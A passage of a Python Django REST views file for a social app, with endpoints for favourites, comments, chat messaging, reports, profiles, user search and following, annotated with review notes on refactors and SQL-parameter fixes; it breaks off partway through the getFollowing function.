@api_view(['GET'])
def getFavouritePost(request):
    """Return every active favourite of the caller, enriched with post data.

    Each favourite entry carries the favourited post's description, price,
    counters, owner details, image list and the caller's like flag.
    Pagination was already disabled in the original (commented out), so all
    favourites are returned in one response.
    """
    try:
        with transaction.atomic():
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            favourite = Favourite.objects.select_related('user', 'post').filter(user_id = user.id,status=1)
            if not favourite:
                return Response({"data":[]}, status=status.HTTP_200_OK)
            favouriteserializer = FavouriteSerializer(favourite,many=True)
            favouriteserializer_data = favouriteserializer.data
            for data in favouriteserializer_data:
                # Fix: the original also did User.objects.get(id=data['user'])
                # here, but never used the result (data['user'] is overwritten
                # below) — that dead per-row query was removed, as were the
                # unused `user1` and `page_num` locals.
                obj1 = Post.objects.get(id = data['post'])
                postimages = PostImage.objects.values('post_images').filter(post_id = obj1)
                data['post_description'] = obj1.post_description
                data['total_likes'] = obj1.total_likes
                data['total_comments'] = obj1.total_comments
                data['price'] = str(obj1.price)
                data['fullname'] = obj1.user.fullname
                data['image'] = obj1.user.image
                data['user'] = obj1.user.id
                data['post_fav'] = True
                data['created_time'] = obj1.created_time
                data['post_type'] = obj1.post_type
                data['post_like'] = PostLike.objects.filter(user_id = user.id,post_id = data['post']).exists()
                data['post_image'] = [d['post_images'] for d in postimages]
            return Response({"data":favouriteserializer_data}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# Api for add post comment
#======================================
@AppVersion_required
@api_view(['POST'])
def addPostComment(request):
    """Create a comment on an active post and bump its comment counter.

    Returns the freshly created comment (with author details and the post's
    new total_comments) so the client can render it without a refetch.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                user = token_row.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            created_at = datetime.datetime.utcnow().replace(tzinfo=utc)
            post_id = payload['post_id']
            # Raises DoesNotExist for an admin-disabled post, which the outer
            # handler reports with the "disabled by admin" message.
            post = Post.objects.get(id=post_id, post_status=1)
            comment = PostComment.objects.create(post_id=post.id,
                                                 user_id=user.id,
                                                 comment=payload["comment"],
                                                 created_time=created_at,
                                                 status=1)
            if not comment:
                return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            Post.objects.filter(id=post.id).update(total_comments=post.total_comments + 1)
            refreshed = Post.objects.get(id=post_id)
            post_comment_detail = {
                "message": PostCommentMessage,
                "id": comment.id,
                "user": comment.user.id,
                "fullname": comment.user.fullname,
                "image": comment.user.image,
                "post_id": comment.post_id,
                "comment": comment.comment,
                "created_time": comment.created_time,
                "total_comments": refreshed.total_comments,
            }
            return Response(post_comment_detail, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===================================
# Api for delete post comment
#====================================
@AppVersion_required
@api_view(['POST'])
def deletePostComment(request):
    """Soft-delete one of the caller's comments and decrement the post counter.

    The comment row stays in the table with status 0; only the comment's own
    author may delete it.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                user = token_row.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            comment_id = payload['comment']
            comment_row = PostComment.objects.get(id=comment_id)
            post = Post.objects.get(id=comment_row.post_id)
            owns_active_comment = PostComment.objects.filter(id=comment_id, user_id=user.id, status=1).exists()
            if not owns_active_comment:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            PostComment.objects.filter(id=comment_id, user_id=user.id).update(status=0)
            Post.objects.filter(id=post.id).update(total_comments=post.total_comments - 1)
            return Response({"message" : DeleteCommentMessage, "status" : "1"}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
# Api for get list of comments for a particular post
#====================================================
@AppVersion_required
@api_view(['GET'])
def GetPostComment(request,pk):
    """Return all active comments of post *pk*, oldest first.

    Comments are fetched newest-first and then reversed so the client
    receives them in chronological order; each entry is enriched with the
    author's fullname and image.  An inactive post raises DoesNotExist and
    is reported via the "disabled by admin" handler.
    """
    try:
        with transaction.atomic():
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            post= Post.objects.get(pk=pk,post_status=1)
            # Fix: removed a dead `user1 = User.objects.get(id=user.id)` —
            # its result was never used.
            postComment = PostComment.objects.filter(post_id = post.id,status=1).order_by('-created_time')
            if postComment:
                postcommentserializer = PostCommentSerializer(postComment,many=True)
                postcommentserializer_data = postcommentserializer.data
                postcommentserializer_data.reverse()
                for data in postcommentserializer_data:
                    author = User.objects.get(id=data['user'])
                    data['fullname'] = author.fullname
                    data['image'] = author.image
                return Response({"message" : "Comments fetched successfully","data":postcommentserializer_data}, status=status.HTTP_200_OK)
            else:
                return Response({"message" : "Comments fetched successfully", "data":[]}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# Api for send message
#=========================================
@AppVersion_required
@api_view(["POST"])
def sendMessage(request):
    """Store a chat message from the caller and push a notification.

    The push is only attempted when the receiver has a login token and has
    notifications enabled; either way the created message payload is
    returned to the sender.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            tempS = datetime.datetime.utcnow().replace(tzinfo=utc)
            # Fix: the sender row was fetched twice (`u` and an identical
            # `send`); a single fetch is kept and reused below.
            u = User.objects.get(id=user.id)
            rec = User.objects.get(id = received_json_data["receiver_id"])
            authuser = Message.objects.create(sender_id=u.id,
                                              message = received_json_data["message"],
                                              receiver_id = received_json_data["receiver_id"],
                                              created_time =tempS)
            data = {
                "sender": u.id,
                "receiver": authuser.receiver_id,
                "message": authuser.message,
                "is_read": authuser.is_read,
                "sender_status": authuser.sender_status,
                "receiver_status": authuser.receiver_status,
                "created_time": authuser.created_time,
                "image": u.image,
            }
            if authuser is not None:
                try:
                    # Raises if the receiver has never logged in (no token);
                    # in that case the push is skipped but the message is
                    # still returned.
                    Token.objects.get(user_id = received_json_data["receiver_id"])
                    if rec.onoffnotification == 1:
                        notify = SendChatNotification(u.id, str(u.fullname), str(u.image), rec.id, str(rec.fullname) , str(rec.image), tempS, received_json_data["message"], str(u.fullname) + " has sent you a message")
                    return Response(data, status=status.HTTP_200_OK)
                except:
                    return Response(data, status=status.HTTP_200_OK)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================================
#Api for get message
#===========================================
@AppVersion_required
@api_view(['POST'])
def getMessage(request): # chat one to one
    """Return the one-to-one conversation between the caller and user `id`.

    Messages hidden by either side (sender_status / receiver_status = 0) are
    excluded, everything the other user sent the caller in this thread is
    marked read, and each entry is annotated with both profile images.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                user = token_row.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            other = User.objects.get(id=payload['id'])
            sent_by_me = Q(sender_id=user.id) & Q(receiver_id=other.id) & Q(sender_status=1)
            sent_to_me = Q(sender_id=other.id) & Q(receiver_id=user.id) & Q(receiver_status=1)
            msg = Message.objects.filter(sent_by_me | sent_to_me).order_by('created_time')
            # Mark the incoming half of the thread as read.
            Message.objects.filter(receiver_id=user.id, sender_id=other.id).update(is_read=1)
            msgs = MessageSerializer(msg, many=True).data
            if not msgs:
                return Response({"data":[], "message": "no data"}, status=status.HTTP_200_OK)
            for data in msgs:
                data['image'] = User.objects.get(id=data['sender']).image
                data['image1'] = User.objects.get(id=data['receiver']).image
            return Response({"data":msgs}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===============================================
#Api for get chat history
#===============================================
@AppVersion_required
@api_view(['GET'])
def chatHistory(request): # get latest messages
    """Return the caller's conversation list, newest conversation first.

    Raw SQL picks, for each chat partner, the most recent message still
    visible to the caller, paginated 20 per page via ?page_num=N.
    NOTE(review): the SQL uses MySQL-specific if()/date_format/concat —
    appears tied to a MySQL backend; confirm before porting.
    """
    try:
        with transaction.atomic():
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            page_num = int(request.GET['page_num'])
            # Page size for the LIMIT clause below.
            maxRecords = 20
            cursor = connection.cursor()
            # NOTE(review): the SQL is built by string concatenation. Only
            # user.id (a server-derived integer from the auth token) is
            # interpolated here, but binding it as a query parameter would
            # still be safer.
            # The inner "group by if(...)" collapses both directions of a
            # conversation (A->B and B->A) into one key, and max(id) keeps
            # only the latest message per conversation.
            # condition = "select * from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
            condition = "select *,date_format(created_time, '%Y-%m-%dT%T.000Z') as created_time from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
            paginationCondition = " LIMIT "+ str((page_num - 1) * maxRecords) + "," + str(maxRecords) + " "
            cursor.execute (condition + paginationCondition)
            d = dictfetchall(cursor)
            print("d", d)
            # Second, un-paginated run of the same query just to count the
            # total number of conversations for total_pages.
            cursor1 = connection.cursor()
            cursor1.execute(condition)
            d1 = dictfetchall(cursor1)
            totalRecords= len(d1)
            # NOTE(review): cursor1 is never closed — confirm the connection
            # lifecycle makes this harmless.
            cursor.close()
            # Ceiling division: pages needed to show totalRecords rows.
            totalPage = (totalRecords + maxRecords - 1) / maxRecords;
            print(int(totalPage))
            if d:
                # Enrich each conversation row with both participants'
                # profile data and a flag telling who sent the last message.
                for data in d:
                    obj = User.objects.get(id = data['sender_id'])
                    obj1 = User.objects.get(id = data['receiver_id'])
                    data['sender_image'] = obj.image
                    data['receiver_image'] = obj1.image
                    data['sender_name'] = obj.fullname
                    data['receiver_name'] = obj1.fullname
                    if obj.id == user.id:
                        data['is_sent_by_me'] = True
                    else:
                        data['is_sent_by_me'] = False
                return Response({"data":d ,"cart_count":user.cartNo, "total_pages": int(totalPage)}, status=status.HTTP_200_OK)
            else:
                return Response({"data":[],"cart_count":user.cartNo, "message": "no data"}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
#Api for delete message
#=========================================
@AppVersion_required
@api_view(["POST"])
def deleteMessage(request):
    """Hide an entire conversation with *receiver_id* from the caller's side.

    Marks the caller's copies of the thread invisible (sender_status /
    receiver_status = False) and returns the refreshed, paginated chat
    history so the client can update its list in place.
    NOTE(review): if no Authorization header is sent at all, the original
    falls through without returning a Response; that behaviour is preserved.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkUser = user.groups.filter(name='User').exists()
                except:
                    return Response({'message' : "Session expired! Please login again", "status":"0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkUser is not None:
                    receiver_id = request.data["receiver_id"]
                    u = User.objects.get(id=user.id)
                    page_num = int(request.data['page_num'])
                    maxRecords = 20
                    # Capture the id of the last (20th) conversation on the
                    # current page before deleting, so the client learns which
                    # row disappeared.
                    cursor3 = connection.cursor()
                    condition = "select *,date_format(created_time, '%Y-%m-%dT%T.000Z') as created_time from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
                    paginationCondition = " LIMIT "+ str(((page_num - 1) * maxRecords)+19) + "," + str(1) + " "
                    cursor3.execute (condition + paginationCondition)
                    d = dictfetchall(cursor3)
                    cursor3.close()
                    if d== []:
                        last_ele=""
                    for i in d:
                        last_ele=i['id']
                    # Security fix: receiver_id comes straight from the request
                    # body, so it is bound as a query parameter instead of being
                    # concatenated into the SQL string (SQL injection risk).
                    cursor = connection.cursor()
                    cursor.execute("update message SET sender_status = False where (sender_id=%s and receiver_id=%s)", [u.id, receiver_id])
                    cursor.execute("update message SET receiver_status = False where (receiver_id = %s and sender_id = %s)", [u.id, receiver_id])
                    cursor.close()
                    # Re-run the history query (same shape as chatHistory) so
                    # the client gets the refreshed page after the delete.
                    cursor2 = connection.cursor()
                    condition = "select *,date_format(created_time, '%Y-%m-%dT%T.000Z') as created_time from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
                    paginationCondition = " LIMIT "+ str(((page_num - 1) * maxRecords)+19) + "," + str(1) + " "
                    cursor2.execute (condition + paginationCondition)
                    d = dictfetchall(cursor2)
                    cursor1 = connection.cursor()
                    cursor1.execute(condition)
                    d1 = dictfetchall(cursor1)
                    totalRecords= len(d1)
                    cursor2.close()
                    # Ceiling division for the total page count.
                    totalPage = (totalRecords + maxRecords - 1) / maxRecords
                    if d:
                        for data in d:
                            obj = User.objects.get(id = data['sender_id'])
                            obj1 = User.objects.get(id = data['receiver_id'])
                            data['sender_image'] = obj.image
                            data['receiver_image'] = obj1.image
                            data['sender_name'] = obj.fullname
                            data['receiver_name'] = obj1.fullname
                            if obj.id == user.id:
                                data['is_sent_by_me'] = True
                            else:
                                data['is_sent_by_me'] = False
                        if last_ele=="":
                            return Response({"message": "delete successfully", "status":"1","data":d ,"cart_count":user.cartNo,"total_pages": int(totalPage)}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message": "delete successfully", "status":"1","data":d ,"cart_count":user.cartNo,"deleted_message":last_ele, "total_pages": int(totalPage)}, status=status.HTTP_200_OK)
                    else:
                        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=======================================
#Api for report post by user
#=======================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def report_post(request):
    """File a report against an active post on behalf of the caller.

    A caller can report a given post at most once; the reason string sent by
    the client is stored verbatim.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                user = token_row.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            reported_post = Post.objects.get(id=payload['post_id'], post_status=1)
            already_reported = ReportPost.objects.filter(user_id=user.id, post_id=reported_post)
            if already_reported:
                return Response({"message":"You have already reported for this post","status":"1"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            # Every branch of the original if/elif chain stored the client's
            # reason verbatim, so one create covers all of them identically.
            ReportPost.objects.create(user_id=user.id,
                                      post_id=reported_post.id,
                                      reason=payload['reason'],
                                      status=1)
            return Response({"message":"successfully reported","status":"1"},status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# #==============================================
# # get user profile
# #==============================================
# @AppVersion_required
# @csrf_exempt
# @api_view(['GET'])
# def Myprofile(request):
# try:
# with transaction.atomic():
# # received_json_data = json.loads(request.body, strict=False)
# try:
# api_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=api_key)
# user = token1.user
# check_group = user.groups.filter(name='User').exists()
# if check_group == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# print(traceback.format_exc())
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# serializer = UserSerializer(user).data
# posts = Post.objects.filter(user_id=user.id,post_status=1)
# post1 = PostImage.objects.values('post_images').filter(post_id__in = posts)
# temp = []
# for p in post1:
# temp.append(p['post_images'])
# serializer['post_image'] = temp
# return Response({"response":serializer},status=status.HTTP_200_OK)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
# Get user profile
#==============================================
@AppVersion_required
@csrf_exempt
@api_view(['GET'])
def Userprofile(request,pk):
    """Return user *pk*'s profile, their posts' images and a follow flag.

    follow_status tells whether the authenticated caller already follows
    the profile owner; user_id echoes the caller's own id.
    """
    try:
        with transaction.atomic():
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                check_group = user.groups.filter(name='User').exists()
                if check_group == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            user1 = User.objects.get(pk=pk)
            serializer = UserSerializer(user1).data
            follow = FollowUser.objects.filter(follow_by_id = user.id, follow_to_id = user1.id)
            # Fix: removed a dead `posts = Post.objects.filter(...)` queryset
            # (never used — and it even filtered on the caller, not the
            # profile owner) and the unused `temp1` list.
            # One representative image per active post of the profile owner,
            # newest post first.  NOTE(review): SQL built by concatenation;
            # user1.id comes from the DB row so injection risk is low, but a
            # bound parameter would still be safer.
            cursor = connection.cursor()
            cursor.execute("select post_id as post,post_images as post_image from postimage pi inner join post p on p.id = pi.post_id and p.user_id=" + str(user1.id) + " and post_status = 1 group by p.id order by p.created_time desc ")
            d = dictfetchall(cursor)
            cursor.close()
            serializer['post_images'] = d
            serializer["follow_status"] = bool(follow)
            serializer['user_id'] = user.id
            return Response({"data":serializer },status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#============================================================
# Search user by username or fullname
#===========================================================
def dictfetchall(cursor):
    """Fetch every remaining row from *cursor* as column-name -> value dicts.

    Returns a list with one dict per row, keyed by the names in the cursor's
    ``description``.
    """
    column_names = tuple(col_desc[0] for col_desc in cursor.description)
    rows = []
    for record in cursor.fetchall():
        rows.append(dict(zip(column_names, record)))
    return rows
def _paged_user_query(condition, params, page_num, max_records):
    """Run *condition* (with *params*) twice: once LIMIT'ed for the requested
    page of rows, once unpaginated to derive the total page count.

    Returns (rows, total_pages). Cursors are context-managed so both are
    closed even on error (the original leaked its count cursor).
    """
    offset = (page_num - 1) * max_records
    with connection.cursor() as cursor:
        cursor.execute(condition + " LIMIT %s, %s", params + [offset, max_records])
        rows = dictfetchall(cursor)
    with connection.cursor() as cursor:
        cursor.execute(condition, params)
        total_records = len(dictfetchall(cursor))
    total_pages = (total_records + max_records - 1) // max_records  # ceil division
    return rows, total_pages


@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def searchUser(request):
    """Search users by fullname or username, 20 results per page.

    POST body: {'searchText': ...}; query string: ?page_num=N. Works both
    anonymously and with a token; an authenticated caller is excluded from
    their own results. An empty searchText lists all completed profiles
    ordered by fullname. Search text is passed as a bound SQL parameter
    (the original interpolated it into the query — SQL injection).
    """
    try:
        with transaction.atomic():
            if request.META.get('HTTP_AUTHORIZATION') == None:
                user = None
            else:
                try:
                    api_key = request.META.get('HTTP_AUTHORIZATION')
                    token1 = Token.objects.get(key=api_key)
                    user = token1.user
                    if not user.groups.filter(name='User').exists():
                        return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                except:
                    print(traceback.format_exc())
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            received_json_data = json.loads(request.body, strict=False)
            page_num = int(request.GET['page_num'])
            maxRecords = 20
            # Escape '_' so it matches a literal underscore, not a LIKE wildcard.
            searchText = received_json_data['searchText'].replace("_", "\\_")
            # Authenticated callers are excluded from their own results.
            exclude_self = "" if user is None else "(id != %s) and "
            params = [] if user is None else [user.id]
            if searchText:
                condition = ("select id,fullname, user_name, image from auth_user "
                             "where " + exclude_self + "is_pro_created = True "
                             "and (fullname like %s or user_name like %s) "
                             "and id in (select user_id as id from auth_user_groups where group_id != 2)")
                like = "%" + str(searchText) + "%"
                d, totalPage = _paged_user_query(condition, params + [like, like], page_num, maxRecords)
                return Response({"status": "1", 'message': 'Get successfully','data':d, "total_pages": int(totalPage)},status=status.HTTP_200_OK)
            else:
                condition = ("select id,fullname, user_name, image from auth_user "
                             "where " + exclude_self + "is_pro_created = True "
                             "and (fullname != '' and user_name != '') "
                             "and id in (select user_id as id from auth_user_groups where group_id != 2) "
                             "order by fullname asc")
                d, totalPage = _paged_user_query(condition, params, page_num, maxRecords)
                return Response({'message': 'Get successfully', 'data':d, "total_pages": int(totalPage)},status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#========================================================
# Set user follower and following
# =======================================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def setFollow(request):
    """Follow ('follow_status' == 1) or unfollow (== 0) the user given by
    'follow_to' in the POST body.

    Keeps both users' denormalized follower/following counters in sync and,
    when the followed user allows notifications, records a Notification row
    and attempts an FCM push. Returns 401 on auth failure; 500 for duplicate
    follow / missing unfollow / bad follow_status.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            follow_to_id = received_json_data['follow_to']
            user1 = User.objects.get(id=follow_to_id)
            nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
            follow_status = int(received_json_data['follow_status'])
            if follow_status == 1:
                follow = FollowUser.objects.filter(follow_by_id=user.id, follow_to_id=user1.id)
                if not follow.exists():
                    follow = FollowUser.objects.create(follow_by_id=user.id, follow_to_id=user1.id)
                    # Keep the denormalized counters on both sides in step.
                    User.objects.filter(id=user1.id).update(total_follower=user1.total_follower + 1)
                    User.objects.filter(id=user.id).update(total_following=user.total_following + 1)
                    if user1.onoffnotification == 1:
                        Notification.objects.create(id=uuid.uuid1(),
                                                    receiver_id=follow_to_id,
                                                    sender_id=user.id,
                                                    message="has followed you",
                                                    tag="follow",
                                                    notification_time=nowTime,
                                                    table_id=follow.id)
                        try:
                            # Only push when the receiver has a live session token.
                            Token.objects.get(user_id=follow_to_id)
                            # BUG FIX: a space was missing between the name and
                            # the verb ("John Smithhas followed you").
                            SendSetFollowNotification(receiverId=follow_to_id, senderId=user.id, title="notification", message=str(user.fullname) + " has followed you", tag="follow", table_id=follow.id)
                        except:
                            pass
                    # BUG FIX: previously fell through without returning any
                    # Response when the target had notifications disabled.
                    return Response({"status": "1", 'message': "set User Following"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": "already in following list", "status": "0"},
                                    status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            elif follow_status == 0:
                follow = FollowUser.objects.filter(follow_by_id=user.id, follow_to_id=user1.id)
                if follow.exists():
                    follow.delete()
                    User.objects.filter(id=user1.id).update(total_follower=user1.total_follower - 1)
                    User.objects.filter(id=user.id).update(total_following=user.total_following - 1)
                    return Response({"status": "1", 'message': "unfollowed sucessfully"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": "Already not in followlist ", "status": "0"},
                                    status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================================
# Get user followers
#=========================================================
@AppVersion_required
@api_view(['POST'])
def getFollowers(request):
    """List the followers of the user id given in the POST body.

    Each entry is the serialized FollowUser row annotated with the follower's
    profile fields and a ``follow_status`` flag telling whether the caller
    follows that follower. Returns 401 on auth failure, 500 otherwise.
    """
    try:
        with transaction.atomic():
            body = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                caller = token_row.user
                if not caller.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            target_id = body['user_id']
            follower_rows = FollowUser.objects.select_related('follow_by').filter(follow_to_id = target_id)
            if not follower_rows:
                return Response({"data" : []}, status=status.HTTP_200_OK)
            payload = FollowUserSerializer(follower_rows, many=True).data
            for entry in payload:
                profile = User.objects.get(id=entry['follow_by'])
                entry['fullname'] = profile.fullname
                entry['image'] = profile.image
                entry['user_name'] = profile.user_name
                # Does the caller themselves follow this follower?
                is_followed = FollowUser.objects.filter(follow_by_id=caller.id, follow_to_id=entry['follow_by'])
                entry["follow_status"] = True if is_followed else False
            return Response({"data": payload}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================================
#Get user Following
#====================================================================
@AppVersion_required
@api_view(['POST'])
def getFollowing(request):
    """List the users that the user id given in the POST body is following.

    Each entry is the serialized FollowUser row annotated with the followed
    user's profile fields and a ``follow_status`` flag telling whether the
    caller follows that user too. Returns 401 on auth failure, 500 otherwise.
    (The original also built an unused ``temp`` list of querysets; removed.)
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            user_id = received_json_data['user_id']
